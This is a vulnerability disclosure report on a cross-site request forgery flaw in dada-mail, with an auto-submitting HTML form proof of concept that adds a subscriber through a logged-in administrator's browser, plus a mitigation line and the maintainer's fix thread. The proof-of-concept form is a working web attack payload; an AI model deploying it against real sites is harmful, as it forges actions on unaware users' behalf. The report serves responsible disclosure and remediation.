Cross-Site Request Forgery (CSRF) in justingit/dada-mail


Reported on

Sep 12th 2021

✍️ Description

Attacker able to Add any number of subscriber with CSRF attack.

In CSRF attacks it is necessary that a user logged into your application and just going to a malicious website and after that only with a redirection attacker can perform attack on unprotected endpoint, this means only with visiting a site a unwanted action will be perform without that user aware from that.

Or users with low level privilege can send a link to other users and admins with higher privilege and then their malicious request will be executed without that victim users and admins be aware about that.

🕵️‍♂️ Proof of Concept

1.First of all admin or user with right privileges already should be logged in any browser.

2.Open the PoC.html (it is auto-submit).

3.Here subscriber with email will be added after the PoC.html file opened.

// PoC.html

  <script>history.pushState('', '', '/')</script>
    <form action="" method="POST">
      <input type="hidden" name="flavor" value="add&#95;email" />
      <input type="hidden" name="type" value="list" />
      <input type="hidden" name="return&#95;to" value="" />
      <input type="hidden" name="return&#95;address" value="" />
      <input type="hidden" name="not&#95;members&#95;fields&#95;options&#95;mode" value="preserve&#95;if&#95;defined" />
      <input type="hidden" name="address" value="&quot;test&#64;test&#46;com&quot;&#44;&quot;&quot;" />
      <input type="hidden" name="process" value="Subscribe&#47;Update&#32;Checked&#32;Addresses&#32;â&#135;&#146;" />
      <input type="submit" value="Submit request" />

This PoC can perform attack without that users noticed and Also PoC can send multiple request at same time that means attacker can Bruteforce all possible actions ( with using multiple Iframe )

💥 Impact

This vulnerability is capable of make medium damage on availability and integrity of system.


You should set a CSRF token for each user/form.

We have contacted a member of the justingit/dada-mail team and are waiting to hear back 2 years ago
Justin J validated this vulnerability 2 years ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Justin J
2 years ago


All CSFR vulnerabilities are fixed in the following branch, which will be merged in master soon:

Justin J marked this as fixed with commit e9fc1c 2 years ago
Justin J has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation